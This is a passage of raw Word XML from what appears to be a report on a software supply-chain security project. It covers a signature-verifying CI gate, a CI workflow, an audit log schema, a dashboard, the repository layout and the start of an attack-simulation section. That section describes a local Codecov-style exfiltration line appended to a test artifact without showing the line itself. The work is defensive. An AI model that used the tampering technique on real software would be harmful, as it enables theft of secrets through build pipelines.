          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS → DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ci/security_gate.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> wraps the verifier for pipelines. It prints the verification telemetry and returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exit code 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ("GATE DECISION: ALLOWED / DEPLOY") or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exit code 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ("GATE DECISION: BLOCKED / ABORT"), which makes any CI system (GitHub Actions, GitLab CI, Jenkins) stop the pipeline before the uploader is executed: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 name: Download vendor uploader</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  run: |</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl -sO https://dist.vendor.example/uploader.sh</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl -sO https://dist.vendor.example/uploader.sh.manifest.json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl -sO https://dist.vendor.example/uploader.sh.provenance.json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>- name: Supply-chain security gate          # exit 1 stops the job here</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  run: python ci/security_gate.py --artifact uploader.sh --manifest uploader.sh.manifest.json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>- name: Run verified uploader</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  run: bash uploader.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.10 Audit Log and Dashboard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CREATE TABLE IF NOT EXISTS audit_logs (</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    timestamp TEXT NOT NULL,        artifact TEXT NOT NULL,   version TEXT NOT NULL,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    sha256 TEXT NOT NULL,           key_id TEXT NOT NULL,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    verification_result TEXT NOT NULL,   -- PASS, BLOCKED, REVOKED, HASH_MISMATCH,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                                         -- INVALID_SIGNATURE, UNAUTHORIZED_KEY</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    user_process TEXT NOT NULL,     action TEXT NOT NULL,     -- SIGN_RELEASE, DEPLOY, BLOCK</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    rejection_reason TEXT</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Every signing attempt and verification outcome is recorded with its timestamp, artifact, version, digest, key ID, result, process and reason. The Flask dashboard (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>python dashboard/app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, http://127.0.0.1:5000) shows the total events, legitimate deploys, attacks blocked and false-acceptance rate. It also shows the audit trail, the current revocation list and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Verify Legitimate Artifact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> button that runs the verifier live (Figure 7.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.11 Implementation Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Technology stack</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2041"/>
        <w:gridCol w:w="6917"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technology</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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Python 3.10+ (validated on 3.11)</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Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PyCA </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cryptography</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> [17]: Ed25519, PEM / PKCS#8 / SubjectPublicKeyInfo; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hashlib</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> SHA-256</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Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>JSON (manifest, provenance, CRL); SQLite (audit log)</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CI/CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Command-line gate with exit codes</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Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6917"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Flask + Bootstrap 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pP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secure-supply-chain/</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── vendor/            build.py, sign.py, key_manager.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── verifier/          verify.py, manifest.py, policy.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── artifacts/         uploader.sh, uploader.sh.manifest.json, uploader.sh.provenance.json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── attack_simulation/ tamper.py, revoked_key_test.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── ci/                security_gate.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── audit/             audit_logger.py, supply_chain_audit.db</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── dashboard/         app.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── keys/              &lt;key_id&gt;_priv.pem, &lt;key_id&gt;_pub.pem, revoked_keys.json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── tests/             test_supply_chain.py</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── docs/              architecture.md, threat_model.md, ...</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>├── demo.py            requirements.txt       README.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>How to run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</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python demo.py -i                            # 14-step live demonstration (Enter between steps)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python tests/test_supply_chain.py            # nine required test cases + metrics</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python attack_simulation/tamper.py           # Scenario 2: Codecov-style tampering</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python attack_simulation/revoked_key_test.py # Scenarios 3 and 4: rogue / revoked keys, replay</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python ci/security_gate.py                   # CI gate on the legitimate release (exit 0)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python dashboard/app.py                      # dashboard at http://127.0.0.1:5000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.12 Attack Simulation Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">All attacks run locally against the files in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>artifacts/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>tamper.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> backs up the genuine uploader, appends a Codecov-style exfiltration line, runs the customer verifier and restores the original. Its payload only targets the loopback address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>never executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>; the file is only hashed and verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Attack scenarios</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2041"/>
        <w:gridCol w:w="3855"/>
        <w:gridCol w:w="3061"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attacker action</w:t>
            </w:r>
          </w:p>
        </w:tc>
